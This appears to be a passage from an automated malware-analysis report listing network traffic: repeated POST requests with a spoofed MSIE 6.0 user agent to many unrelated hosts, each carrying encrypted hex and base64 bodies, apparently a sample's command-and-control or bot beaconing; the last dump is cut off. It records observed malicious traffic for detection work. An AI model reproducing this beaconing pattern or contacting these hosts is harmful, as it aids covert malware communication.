                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tc17.comCache-Control: no-cacheData Raw: 44 2b 54 6f 34 69 43 4d 39 77 35 30 78 30 52 32 63 39 44 31 54 31 4d 6f 46 36 61 49 72 58 6f 49 56 44 58 41 33 2f 7a 70 43 71 47 7a 35 64 53 69 38 74 56 64 31 61 43 62 43 59 72 7a 39 42 79 39 64 65 5a 7a 50 33 32 51 69 30 46 6f 62 39 71 6d 55 2f 30 4d 74 56 59 44 58 38 4c 66 32 6a 50 7a 2b 4c 58 61 58 79 45 76 54 72 32 4b 49 59 50 2f 64 4d 4a 51 6c 66 6b 55 66 4f 6f 6c 62 5a 74 62 50 64 61 49 58 64 56 73 4c 70 59 43 39 34 32 43 75 67 43 43 61 38 6c 4d 2f 50 4d 4a 59 39 6b 31 72 31 4d 62 59 66 37 54 4f 73 47 75 45 32 6a 34 58 4c 72 59 78 45 35 31 6d 52 41 31 59 4c 70 65 39 30 72 6e 2b 68 64 6d 32 63 33 42 73 2f 70 53 4d 31 64 43 7a 61 4e 54 58 69 75 59 39 51 56 61 41 48 59 72 42 66 78 30 41 65 69 4f 42 67 46 51 4e 4d 70 6b 7a 34 33 41 58 54 73 62 50 76 50 57 2f 56 6f 31 51 38 39 45 76 2f 73 6c 73 69 59 39 47 4d 47 39 43 41 49 47 49 35 6f 32 72 64 2f 38 41 62 32 4c 6b 41 7a 30 6d 59 36 71 4d 32 42 6d 30 55 6f 32 45 4d 45 72 6e 56 76 68 4f 66 70 4f 31 2f 4b 46 31 35 74 79 66 55 6d 32 62 76 63 59 37 7a 78 6a 4b 78 53 57 59 76 6b 64 59 59 78 55 2f 43 64 52 56 37 6d 4d 58 43 7a 56 2b 6b 58 71 6a 6e 55 43 32 62 44 6e 71 63 66 75 31 4c 37 46 58 35 4b 70 43 48 34 64 6e 52 46 67 4f 38 4b 46 64 48 62 73 31 68 6f 67 32 41 42 70 76 52 4e 2f 74 6a 4d 46 75 58 36 48 71 72 72 50 36 73 41 53 63 53 59 7a 7a 68 4b 79 66 69 6b 63 48 49 63 76 56 77 63 51 50 34 67 63 70 6f 63 4a 4f 39 38 79 47 74 54 41 68 62 76 73 48 76 73 38 76 65 73 63 31 58 59 7a 75 35 35 61 49 68 35 63 67 63 78 4a 32 59 71 43 68 47 7a 4b 66 6f 43 7a 35 50 53 57 32 2b 72 71 68 4a 52 41 59 62 74 62 62 4e 2b 45 4e 56 2f 44 51 41 75 51 37 69 77 52 4a 33 36 48 48 36 33 47 6c 6a 56 79 43 64 45 46 7a 68 50 62 49 4b 52 71 73 77 44 44 2f 70 6c 69 33 51 30 6f 42 4e 6a 4d 6e 58 30 2f 42 45 6e 31 50 34 4a 4f 72 70 63 3d Data Ascii: D+To4iCM9w50x0R2c9D1T1MoF6aIrXoIVDXA3/zpCqGz5dSi8tVd1aCbCYrz9By9deZzP32Qi0Fob9qmU/0MtVYDX8Lf2jPz+LXaXyEvTr2KIYP/dMJQlfkUfOolbZtbPdaIXdVsLpYC942CugCCa8lM/PMJY9k1r1MbYf7TOsGuE2j4XLrYxE51mRA1YLpe90rn+hdm2c3Bs/pSM1dCzaNTXiuY9QVaAHYrBfx0AeiOBgFQNMpkz43AXTsbPvPW/Vo1Q89Ev/slsiY9GMG9CAIGI5o2rd/8Ab2LkAz0mY6qM2Bm0Uo2EMErnVvhOfpO1/KF15tyfUm2bvcY7zxjKxSWYvkdYYxU/CdRV7mMXCzV+kXqjnUC2bDnqcfu1L7FX5KpCH4dnRFgO8KFdHbs1hog2ABpvRN/tjMFuX6HqrrP6sAScSYzzhKyfikcHIcvVwcQP4gcpocJO98yGtTAhbvsHvs8vesc1XYzu55aIh5cgcxJ2YqChGzKfoCz5PSW2+rqhJRAYbtbbN+ENV/DQAuQ7iwRJ36HH63GljVyCdEFzhPbIKRqswDD/pli3Q0oBNjMnX0/BEn1P4JOrpc=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 30 69 7a 33 64 79 43 52 73 51 35 6c 52 4f 69 42 63 78 46 6d 35 31 4e 31 73 47 6d 49 78 76 47 51 56 4d 4b 67 37 38 56 75 38 53 4f 6a 76 4c 42 30 38 49 56 4d 75 75 7a 4d 5a 4d 65 32 77 30 68 6e 46 4f 36 67 33 62 55 6a 4d 4a 68 6f 39 73 42 46 4e 4c 45 59 46 56 52 6e 34 6f 49 32 36 4c 57 64 65 6d 79 44 4d 76 58 46 43 45 65 4e 41 76 64 5a 71 44 2f 61 77 69 51 65 50 70 71 44 65 69 48 4d 67 4f 44 4c 50 48 2b 68 78 61 32 77 77 43 41 74 68 48 45 71 4e 6d 53 55 78 75 76 6c 46 5a 62 78 65 43 6c 70 33 63 2f 41 34 54 4b 30 34 79 54 50 34 69 64 6a 48 59 34 42 6d 70 4e 41 5a 64 6c 70 64 62 5a 38 31 74 65 36 53 2b 68 5a 6e 49 30 75 53 6a 72 2f 50 2b 38 31 36 34 7a 2f 63 2f 6f 4f 65 74 4d 30 36 71 71 74 74 48 6b 69 4e 34 31 4f 4b 51 78 4c 68 79 42 7a 64 71 74 37 53 69 30 76 34 4b 62 6a 64 4e 43 39 2f 6d 51 39 51 42 6b 36 76 6e 41 5a 52 4f 6e 62 67 36 44 43 48 4f 39 42 70 74 71 59 65 71 70 4c 42 49 43 4b 47 65 59 65 45 41 71 67 57 6e 66 54 4e 35 74 50 32 51 4a 54 54 6e 48 61 2b 4f 6d 35 4b 56 31 53 6a 66 50 52 69 39 32 37 7a 7a 38 2f 66 63 6e 32 71 2b 74 71 6c 75 43 36 70 51 7a 36 62 66 76 70 5a 4e 6d 74 73 6e 34 55 76 6a 37 4b 72 64 59 53 78 7a 48 53 4b 75 50 49 45 32 59 59 7a 47 77 47 5a 67 4d 76 62 49 43 7a 72 55 49 68 38 39 51 32 6b 53 61 5a 34 46 34 55 62 4e 2f 49 64 48 6f 50 4d 59 68 65 4c 35 74 6c 61 6b 68 4f 68 44 57 6a 4a 68 70 38 51 36 6a 4f 62 6e 37 56 77 79 44 31 68 6c 4d 56 4c 5a 4e 31 36 51 49 39 4c 6b 4e 6e 6d 30 38 4a 42 38 33 49 59 79 62 45 57 52 73 34 55 6b 78 39 74 6e 77 41 76 50 65 50 51 42 53 6c 64 6b 33 48 72 7a 30 33 6c 68 32 36 34 64 37 73 56 53 49 79 65 55 37 42 39 4f 6c 45 54 55 4d 66 76 73 61 70 51 63 2b 73 6f 37 79 63 57 58 61 6d 34 71 39 43 35 63 6d 71 6c 50 2b 4d 59 75 31 4c 77 49 67 74 78 48 30 3d Data Ascii: 0iz3dyCRsQ5lROiBcxFm51N1sGmIxvGQVMKg78Vu8SOjvLB08IVMuuzMZMe2w0hnFO6g3bUjMJho9sBFNLEYFVRn4oI26LWdemyDMvXFCEeNAvdZqD/awiQePpqDeiHMgODLPH+hxa2wwCAthHEqNmSUxuvlFZbxeClp3c/A4TK04yTP4idjHY4BmpNAZdlpdbZ81te6S+hZnI0uSjr/P+8164z/c/oOetM06qqttHkiN41OKQxLhyBzdqt7Si0v4KbjdNC9/mQ9QBk6vnAZROnbg6DCHO9BptqYeqpLBICKGeYeEAqgWnfTN5tP2QJTTnHa+Om5KV1SjfPRi927zz8/fcn2q+tqluC6pQz6bfvpZNmtsn4Uvj7KrdYSxzHSKuPIE2YYzGwGZgMvbICzrUIh89Q2kSaZ4F4UbN/IdHoPMYheL5tlakhOhDWjJhp8Q6jObn7VwyD1hlMVLZN16QI9LkNnm08JB83IYybEWRs4Ukx9tnwAvPePQBSldk3Hrz03lh264d7sVSIyeU7B9OlETUMfvsapQc+so7ycWXam4q9C5cmqlP+MYu1LwIgtxH0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 51 63 52 77 31 6c 58 6e 57 67 38 69 55 35 44 47 50 4a 43 46 30 30 35 75 44 56 4e 6a 68 66 74 67 57 61 6c 68 75 49 77 4e 44 6e 55 37 4c 30 66 6e 64 70 41 61 66 6e 6c 78 4c 77 66 39 52 33 6c 74 4e 4e 45 57 33 58 37 67 75 6e 6e 48 4a 38 7a 2f 72 79 58 6c 42 68 71 75 6e 36 79 66 48 45 4f 39 73 64 4a 31 64 58 34 6f 66 34 53 53 48 73 36 66 66 73 6e 67 56 62 79 64 73 66 33 61 6d 45 6a 69 4b 65 41 62 52 65 33 66 38 2f 6a 34 44 70 62 39 73 33 36 70 54 66 45 66 65 64 4c 53 56 76 69 76 79 6d 48 50 63 5a 66 44 33 45 73 55 33 42 38 2f 71 66 4d 48 63 67 5a 41 4f 31 49 41 75 5a 67 34 50 4b 35 43 52 2b 4a 35 4c 77 32 53 63 75 45 51 49 6c 71 58 77 48 69 53 6f 4b 6c 51 4f 48 6e 72 54 45 2b 39 6a 76 69 70 50 55 37 65 32 56 52 6a 32 56 76 41 54 75 30 56 44 61 6d 6b 52 33 51 56 70 68 4f 74 52 58 35 4a 4d 67 6b 5a 6e 41 59 67 50 76 68 37 6c 4c 6b 56 4b 53 58 69 58 57 4f 6c 39 43 46 33 6f 4c 39 77 4b 46 51 43 70 39 6c 4c 2f 56 4e 58 67 47 49 54 6a 39 45 37 47 75 44 73 31 68 37 39 6d 38 71 4f 6e 59 4d 66 30 79 71 51 75 75 4e 75 63 66 67 62 51 48 39 61 7a 58 53 66 5a 4d 64 54 2b 69 78 4f 4a 4d 70 79 77 42 2b 6e 77 33 6e 62 70 73 64 44 59 39 37 4f 58 75 50 48 54 78 41 62 64 45 53 53 6b 46 76 36 34 48 6e 76 66 38 34 43 55 34 53 44 4c 62 6a 4d 6f 65 75 57 50 66 6b 64 36 79 51 38 43 78 48 48 66 45 64 2f 46 30 71 56 6e 35 5a 2b 47 76 73 51 64 42 2f 6b 63 4d 57 45 68 4d 52 68 36 48 74 71 36 78 69 7a 65 4e 2f 33 56 7a 6a 43 53 2b 67 48 69 76 6a 6f 77 41 4e 46 67 63 66 6a 6f 61 6a 73 5a 38 55 4b 54 78 44 72 57 4e 33 35 6a 55 75 54 2b 68 76 2f 61 52 72 2b 72 74 41 61 68 4c 35 34 61 59 68 30 47 70 38 51 32 6d 42 43 50 6f 4b 53 45 6e 6d 76 45 68 51 4e 4e 57 2b 69 6b 6d 75 6b 6c 66 48 4b 75 6d 30 4a 6c 71 70 72 49 65 4b 39 4e 79 58 46 34 4d 4f 35 48 55 75 78 52 50 34 75 52 67 3d 3d Data Ascii: QcRw1lXnWg8iU5DGPJCF005uDVNjhftgWalhuIwNDnU7L0fndpAafnlxLwf9R3ltNNEW3X7gunnHJ8z/ryXlBhqun6yfHEO9sdJ1dX4of4SSHs6ffsngVbydsf3amEjiKeAbRe3f8/j4Dpb9s36pTfEfedLSVvivymHPcZfD3EsU3B8/qfMHcgZAO1IAuZg4PK5CR+J5Lw2ScuEQIlqXwHiSoKlQOHnrTE+9jvipPU7e2VRj2VvATu0VDamkR3QVphOtRX5JMgkZnAYgPvh7lLkVKSXiXWOl9CF3oL9wKFQCp9lL/VNXgGITj9E7GuDs1h79m8qOnYMf0yqQuuNucfgbQH9azXSfZMdT+ixOJMpywB+nw3nbpsdDY97OXuPHTxAbdESSkFv64Hnvf84CU4SDLbjMoeuWPfkd6yQ8CxHHfEd/F0qVn5Z+GvsQdB/kcMWEhMRh6Htq6xizeN/3VzjCS+gHivjowANFgcfjoajsZ8UKTxDrWN35jUuT+hv/aRr+rtAahL54aYh0Gp8Q2mBCPoKSEnmvEhQNNW+ikmuklfHKum0JlqprIeK9NyXF4MO5HUuxRP4uRg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheData Raw: 72 48 4d 76 31 6b 55 35 36 41 2b 62 70 74 46 4f 62 46 6e 49 4b 62 37 42 53 76 59 54 6c 74 2b 6c 53 61 4c 4d 74 32 64 4b 4a 35 4a 57 7a 62 44 45 7a 51 6d 43 64 4d 4e 67 6d 52 66 56 5a 46 70 77 50 67 41 4f 6a 4c 55 71 6e 6f 2b 6c 30 4a 68 74 41 53 78 41 70 42 36 68 7a 2b 35 37 50 4d 75 33 48 37 36 6d 53 39 78 6b 4c 4b 43 6b 57 75 39 46 58 70 32 61 4f 50 78 65 6a 45 30 52 4a 6f 6d 69 6f 43 68 6a 49 5a 50 35 55 6e 51 57 66 5a 70 37 6d 6f 4c 58 6a 75 31 6d 6e 4d 6a 63 38 76 71 76 51 67 36 2f 56 54 6c 37 4d 74 38 58 78 43 72 70 62 5a 61 68 31 65 59 74 6f 6f 30 55 34 71 68 66 6a 65 6c 48 6c 38 69 64 72 47 4c 4b 72 43 34 4e 69 51 6a 77 6b 72 4d 56 6a 74 50 77 49 46 35 6c 77 6e 7a 61 79 4c 71 48 77 4a 61 62 47 4c 4a 4c 35 48 5a 6f 65 56 39 51 76 64 33 4b 42 55 62 78 6b 51 4f 34 71 33 54 41 66 4d 63 51 4d 53 59 66 67 59 58 62 5a 69 71 54 6b 73 49 43 6e 2b 48 4f 41 71 37 75 4f 74 56 43 37 62 51 4a 46 37 59 39 38 64 44 46 6e 57 67 79 30 4b 6a 61 65 2b 38 74 4c 51 69 77 65 78 47 33 7a 63 55 55 5a 77 43 72 62 6c 6f 49 36 34 44 39 59 57 53 4a 7a 4e 43 76 74 7a 30 56 55 47 58 4f 42 56 32 72 38 65 71 39 5a 4b 43 69 46 54 7a 6b 30 4c 79 30 41 37 64 39 41 56 73 6e 68 50 6e 4a 64 74 4d 45 6e 74 78 45 7a 51 58 4e 4d 54 76 39 34 62 51 6c 6a 2b 55 74 43 6a 4c 61 30 45 35 57 6e 44 67 4c 53 45 46 6f 6e 50 32 63 6a 73 48 43 42 72 73 77 6d 38 35 6e 7a 6f 68 4b 75 6c 33 6f 75 76 6b 68 52 50 37 42 2b 2b 49 59 64 43 4b 73 48 6e 32 78 6e 6d 71 6f 61 6a 78 54 7a 39 6b 65 6b 71 46 41 53 7a 49 57 47 79 43 44 77 48 53 6f 66 66 62 6c 6b 78 6e 76 51 50 64 46 6d 55 6d 50 44 42 61 6c 61 37 39 31 30 5a 6c 58 59 47 74 4a 34 33 64 57 70 66 6a 75 33 4d 55 41 75 77 61 63 33 31 39 4f 57 57 6c 30 55 6c 58 34 69 47 33 2b 30 6b 79 41 42 78 42 64 65 70 41 6c 70 44 41 41 65 68 72 79 55 32 4b 48 76 6a 4d 4b 6d 42 4c 73 4c 77 3d 3d Data Ascii: rHMv1kU56A+bptFObFnIKb7BSvYTlt+lSaLMt2dKJ5JWzbDEzQmCdMNgmRfVZFpwPgAOjLUqno+l0JhtASxApB6hz+57PMu3H76mS9xkLKCkWu9FXp2aOPxejE0RJomioChjIZP5UnQWfZp7moLXju1mnMjc8vqvQg6/VTl7Mt8XxCrpbZah1eYtoo0U4qhfjelHl8idrGLKrC4NiQjwkrMVjtPwIF5lwnzayLqHwJabGLJL5HZoeV9Qvd3KBUbxkQO4q3TAfMcQMSYfgYXbZiqTksICn+HOAq7uOtVC7bQJF7Y98dDFnWgy0Kjae+8tLQiwexG3zcUUZwCrbloI64D9YWSJzNCvtz0VUGXOBV2r8eq9ZKCiFTzk0Ly0A7d9AVsnhPnJdtMEntxEzQXNMTv94bQlj+UtCjLa0E5WnDgLSEFonP2cjsHCBrswm85nzohKul3ouvkhRP7B++IYdCKsHn2xnmqoajxTz9kekqFASzIWGyCDwHSoffblkxnvQPdFmUmPDBala7910ZlXYGtJ43dWpfju3MUAuwac319OWWl0UlX4iG3+0kyABxBdepAlpDAAehryU2KHvjMKmBLsLw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 6e 4d 61 2f 6e 5a 63 75 56 42 45 73 57 63 43 53 68 6e 73 45 4e 65 41 73 71 62 72 4e 6b 71 79 7a 75 31 4d 51 78 74 36 5a 48 68 30 54 78 77 33 33 79 6c 45 73 2f 79 36 2b 4e 64 36 63 73 76 63 4f 49 5a 6d 32 36 30 44 6f 48 70 6f 46 44 64 49 44 78 5a 4b 57 51 39 78 6f 6b 78 71 33 69 72 4f 68 44 78 67 71 52 41 70 72 33 33 36 36 45 78 34 42 6c 37 63 70 59 32 6e 7a 56 4a 4a 33 61 46 55 5a 76 2f 7a 54 44 63 7a 5a 33 44 41 67 4e 59 31 58 6b 5a 6a 30 4e 4d 43 42 38 50 6b 41 77 36 32 6f 6f 52 73 5a 39 72 78 73 46 49 4b 6b 50 68 76 57 50 68 6a 51 4b 2f 6c 6d 38 41 77 71 79 57 67 52 48 48 62 30 79 4c 42 37 56 39 7a 52 4f 69 59 67 51 6c 59 43 37 6c 53 74 43 55 4e 53 65 54 33 65 38 69 56 2f 34 49 78 6a 74 67 77 2b 75 30 4f 2f 61 5a 51 43 34 73 6f 4d 59 49 4f 6d 55 69 68 73 4a 46 70 62 66 68 50 4f 64 4a 2f 79 76 4c 36 68 63 4a 48 49 43 31 61 4f 66 6b 39 43 4f 35 4c 30 4f 73 2b 70 41 74 79 4a 73 51 37 56 34 34 72 2f 48 72 74 52 46 78 74 66 41 61 74 31 7a 62 69 48 39 52 4b 49 4f 52 52 44 53 4c 7a 48 75 43 48 55 45 72 51 4a 66 71 61 6e 36 35 6a 64 53 36 73 42 61 56 50 4f 42 52 2f 79 76 50 51 6f 46 39 4c 6d 69 70 31 2b 57 61 6a 2f 6a 2f 6a 52 4e 39 6c 4b 2f 37 51 37 41 59 51 78 59 51 58 67 77 48 69 4b 4f 63 6d 2b 2f 44 34 58 49 64 4e 49 64 74 56 65 64 33 61 30 63 4d 4b 33 59 5a 71 59 4e 73 67 43 70 73 66 42 6c 6b 6d 44 5a 75 62 70 55 72 4f 6b 73 7a 49 58 59 4a 59 2b 36 2b 65 6c 65 43 50 36 53 49 6d 44 36 33 52 2b 4e 4c 55 58 72 71 31 4e 42 33 76 42 67 69 65 54 63 42 59 6d 67 63 37 47 49 2b 42 73 33 39 71 45 77 44 58 44 59 67 4b 34 46 37 51 77 37 69 71 36 4f 62 61 4c 61 30 66 59 42 6b 4c 31 70 6b 56 6c 4c 69 78 45 30 70 48 34 4c 75 35 72 73 56 31 66 79 71 63 3d Data Ascii: nMa/nZcuVBEsWcCShnsENeAsqbrNkqyzu1MQxt6ZHh0Txw33ylEs/y6+Nd6csvcOIZm260DoHpoFDdIDxZKWQ9xokxq3irOhDxgqRApr3366Ex4Bl7cpY2nzVJJ3aFUZv/zTDczZ3DAgNY1XkZj0NMCB8PkAw62ooRsZ9rxsFIKkPhvWPhjQK/lm8AwqyWgRHHb0yLB7V9zROiYgQlYC7lStCUNSeT3e8iV/4Ixjtgw+u0O/aZQC4soMYIOmUihsJFpbfhPOdJ/yvL6hcJHIC1aOfk9CO5L0Os+pAtyJsQ7V44r/HrtRFxtfAat1zbiH9RKIORRDSLzHuCHUErQJfqan65jdS6sBaVPOBR/yvPQoF9Lmip1+Waj/j/jRN9lK/7Q7AYQxYQXgwHiKOcm+/D4XIdNIdtVed3a0cMK3YZqYNsgCpsfBlkmDZubpUrOkszIXYJY+6+eleCP6SImD63R+NLUXrq1NB3vBgieTcBYmgc7GI+Bs39qEwDXDYgK4F7Qw7iq6ObaLa0fYBkL1pkVlLixE0pH4Lu5rsV1fyqc=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 49 4a 4a 63 4f 2f 2b 7a 55 68 4b 2f 6e 35 56 48 33 72 46 41 73 6f 69 69 59 47 46 56 32 4b 35 62 6f 2f 76 44 74 6b 39 52 66 31 6f 33 73 68 58 54 57 47 5a 74 6f 61 64 4a 65 57 51 31 79 72 63 6f 31 4f 78 5a 45 63 67 47 39 7a 69 4a 64 69 33 41 59 2b 43 39 44 2f 4a 4b 61 54 2f 64 43 79 6b 6a 4e 61 32 34 59 44 35 6b 45 73 46 4f 46 61 2f 4e 45 37 6d 76 45 33 33 2b 39 49 4c 74 34 58 42 62 72 36 78 2b 65 55 71 64 37 2f 74 54 46 68 5a 75 4e 34 36 58 44 44 6c 30 64 66 67 38 33 63 32 62 50 30 76 4a 4b 37 38 5a 4b 6c 39 4a 2b 6a 51 68 31 64 6a 65 48 30 32 2f 75 78 46 49 4e 6e 34 33 56 41 4d 47 79 77 71 62 6b 61 35 45 58 31 42 33 2f 79 5a 62 4b 62 76 61 71 62 6c 44 56 70 4b 73 71 2b 72 33 35 30 49 41 67 35 30 51 75 44 54 73 6f 42 6b 4a 54 6d 2f 4d 4d 53 72 68 4f 48 41 54 70 41 56 43 48 46 58 6e 48 77 50 4e 43 74 6a 2f 4c 4c 55 78 2b 4b 38 74 65 62 47 34 6d 34 4e 62 64 70 35 66 4b 34 34 64 30 65 6d 4b 54 58 30 50 37 35 41 46 4c 48 54 55 6b 42 6b 72 69 4c 30 61 2f 30 72 37 6b 70 57 52 6e 49 48 2f 35 30 2f 50 7a 31 44 78 61 45 77 32 7a 78 6f 74 2f 48 6c 37 46 35 42 6c 2f 39 65 42 44 75 4f 44 4c 63 64 47 2b 2b 36 6b 50 78 37 50 74 54 42 72 2f 54 45 39 57 4c 45 54 2f 34 6a 42 33 34 62 51 6f 77 33 30 38 48 37 63 35 46 52 44 58 43 70 48 72 41 36 43 7a 2f 54 75 63 2f 63 4d 72 71 72 58 39 56 31 4e 70 65 61 4f 50 6c 33 42 4d 6c 36 74 61 4e 77 62 6e 31 2b 46 4e 47 70 7a 77 61 31 50 5a 4d 6c 56 67 6f 52 50 68 73 51 79 56 43 2f 58 59 68 39 79 4e 36 46 30 66 51 69 66 45 6f 5a 59 59 79 58 37 77 70 43 47 63 39 38 6a 2f 4a 56 78 7a 6c 6d 32 48 53 72 69 4b 68 38 42 42 76 47 6e 63 67 57 6c 4e 56 4d 49 56 34 75 4d 36 70 71 44 7a 6c 66 78 55 75 34 54 4b 54 4d 74 67 4d 4a 47 Data Ascii: IJJcO/+zUhK/n5VH3rFAsoiiYGFV2K5bo/vDtk9Rf1o3shXTWGZtoadJeWQ1yrco1OxZEcgG9ziJdi3AY+C9D/JKaT/dCykjNa24YD5kEsFOFa/NE7mvE33+9ILt4XBbr6x+eUqd7/tTFhZuN46XDDl0dfg83c2bP0vJK78ZKl9J+jQh1djeH02/uxFINn43VAMGywqbka5EX1B3/yZbKbvaqblDVpKsq+r350IAg50QuDTsoBkJTm/MMSrhOHATpAVCHFXnHwPNCtj/LLUx+K8tebG4m4Nbdp5fK44d0emKTX0P75AFLHTUkBkriL0a/0r7kpWRnIH/50/Pz1DxaEw2zxot/Hl7F5Bl/9eBDuODLcdG++6kPx7PtTBr/TE9WLET/4jB34bQow308H7c5FRDXCpHrA6Cz/Tuc/cMrqrX9V1NpeaOPl3BMl6taNwbn1+FNGpzwa1PZMlVgoRPhsQyVC/XYh9yN6F0fQifEoZYYyX7wpCGc98j/JVxzlm2HSriKh8BBvGncgWlNVMIV4uM6pqDzlfxUu4TKTMtgMJG
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 58 30 71 4d 50 4e 61 39 55 68 4c 35 39 2f 7a 66 73 64 73 72 72 48 6c 68 2b 4e 78 32 75 47 55 6a 61 6c 64 49 39 51 4f 4f 77 33 62 78 5a 36 34 48 75 50 62 59 49 35 76 45 76 32 47 31 46 43 71 77 6b 46 44 32 6e 2b 56 6d 41 48 30 4c 69 55 74 77 6e 56 55 72 4c 38 41 45 57 74 32 6f 4a 71 4e 53 58 47 54 36 59 67 66 31 41 33 2b 49 34 44 34 53 56 56 6c 68 6b 65 4b 38 48 66 2b 79 78 32 51 48 6e 59 47 50 52 73 72 70 41 79 71 44 44 51 4e 47 69 75 31 45 33 46 36 68 46 36 49 76 67 59 4d 50 54 30 34 51 51 75 6a 53 7a 41 52 31 6c 34 4a 73 63 4a 4a 78 78 45 37 59 73 6d 33 77 47 4e 35 6b 36 35 37 73 77 44 36 47 42 72 6c 65 37 63 2f 50 2b 62 69 6c 2b 62 39 34 55 33 4d 56 37 55 41 30 62 74 4a 6a 50 4d 44 4e 56 73 49 76 53 64 63 2f 4e 57 34 43 59 71 36 32 65 6d 6f 63 48 78 44 2f 36 79 57 6d 49 77 6e 4f 72 43 6b 53 43 37 6f 6b 49 36 50 2b 74 76 67 74 56 52 61 6c 42 4d 2b 44 39 63 63 79 58 63 38 50 58 48 34 6c 51 42 66 53 52 62 50 4e 68 6e 6a 52 53 6d 41 6a 4c 52 55 45 34 47 44 2f 65 48 75 54 4e 43 77 65 49 50 38 5a 57 32 59 6e 42 6b 78 43 36 35 58 49 4d 46 77 71 4d 7a 56 30 47 36 4d 2f 2f 62 69 75 6e 38 79 55 66 41 75 66 77 6a 2f 47 71 59 31 62 32 61 77 66 31 35 67 47 2b 37 73 34 68 62 6c 79 42 73 54 31 4e 79 32 65 73 57 41 38 78 35 72 6e 76 49 48 42 67 4f 4f 6c 74 65 41 31 46 70 42 41 68 39 37 32 70 59 4d 4a 69 63 4b 4f 2b 45 74 36 39 37 4d 46 77 55 43 55 6b 6e 6d 64 52 43 37 62 46 61 7a 52 4b 34 55 53 6a 2f 76 33 6d 57 42 67 32 53 33 70 4a 39 31 68 72 73 4b 6e 48 6c 35 41 48 34 41 2f 73 51 48 37 61 4b 73 6a 4c 4a 44 56 42 4f 71 47 2b 32 46 36 41 6a 2b 50 4d 64 77 6f 38 74 30 71 Data Ascii: X0qMPNa9UhL59/zfsdsrrHlh+Nx2uGUjaldI9QOOw3bxZ64HuPbYI5vEv2G1FCqwkFD2n+VmAH0LiUtwnVUrL8AEWt2oJqNSXGT6Ygf1A3+I4D4SVVlhkeK8Hf+yx2QHnYGPRsrpAyqDDQNGiu1E3F6hF6IvgYMPT04QQujSzAR1l4JscJJxxE7Ysm3wGN5k657swD6GBrle7c/P+bil+b94U3MV7UA0btJjPMDNVsIvSdc/NW4CYq62emocHxD/6yWmIwnOrCkSC7okI6P+tvgtVRalBM+D9ccyXc8PXH4lQBfSRbPNhnjRSmAjLRUE4GD/eHuTNCweIP8ZW2YnBkxC65XIMFwqMzV0G6M//biun8yUfAufwj/GqY1b2awf15gG+7s4hblyBsT1Ny2esWA8x5rnvIHBgOOlteA1FpBAh972pYMJicKO+Et697MFwUCUknmdRC7bFazRK4USj/v3mWBg2S3pJ91hrsKnHl5AH4A/sQH7aKsjLJDVBOqG+2F6Aj+PMdwo8t0q
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 76 73 4f 66 31 39 39 32 54 78 49 6b 2b 61 39 32 50 74 61 62 62 32 6a 45 52 66 61 31 74 45 6a 72 67 30 53 6c 78 4a 53 39 2b 4e 31 53 54 79 53 63 72 4d 6e 77 56 4c 77 53 38 50 48 34 2f 39 51 47 79 46 4d 61 6f 50 2b 63 4c 45 4c 59 75 53 61 57 43 6d 35 45 6f 6a 63 64 6c 53 6c 43 70 71 2f 57 51 6a 64 35 36 78 47 74 4f 7a 6c 54 56 59 4d 67 38 6d 43 66 34 76 31 56 30 59 4d 46 4d 6c 69 32 30 5a 43 71 53 61 54 38 55 72 39 45 35 64 4e 6e 6b 51 71 54 78 53 4d 44 50 7a 45 35 4d 45 78 64 62 6e 37 33 59 7a 4d 56 30 69 36 52 65 5a 76 36 64 38 57 38 56 46 32 48 38 66 58 49 36 58 79 69 2f 69 52 65 62 42 4a 32 35 6a 45 48 42 57 68 48 4c 7a 4e 58 52 59 67 72 54 6e 49 76 44 35 67 6e 38 4c 65 48 77 6d 43 6b 4b 4f 75 47 4e 47 47 72 65 6f 6a 67 47 74 31 4d 32 39 65 33 49 42 42 6d 57 30 37 70 4e 6f 78 74 52 55 78 67 6e 56 4c 51 65 54 7a 54 38 37 45 76 7a 6c 4c 72 69 44 67 79 6a 5a 69 57 2f 44 2b 75 74 67 4c 42 34 61 51 76 47 4c 58 64 6a 64 78 42 6d 73 67 52 63 71 77 66 33 32 39 79 4e 72 64 31 76 4c 2f 56 62 78 6d 36 76 47 72 31 44 6a 7a 6e 68 59 30 61 6b 68 62 35 73 6f 69 2f 32 42 61 43 2b 37 49 64 58 41 4a 76 68 35 58 4b 67 79 57 39 32 42 4a 61 6f 4b 32 70 50 74 6b 6e 62 65 30 75 34 71 38 6c 6f 33 4a 55 46 39 6a 79 6d 6b 4b 35 66 63 63 65 62 4b 6a 42 57 33 35 4e 53 37 62 45 50 2b 43 32 34 58 59 47 35 32 6a 67 79 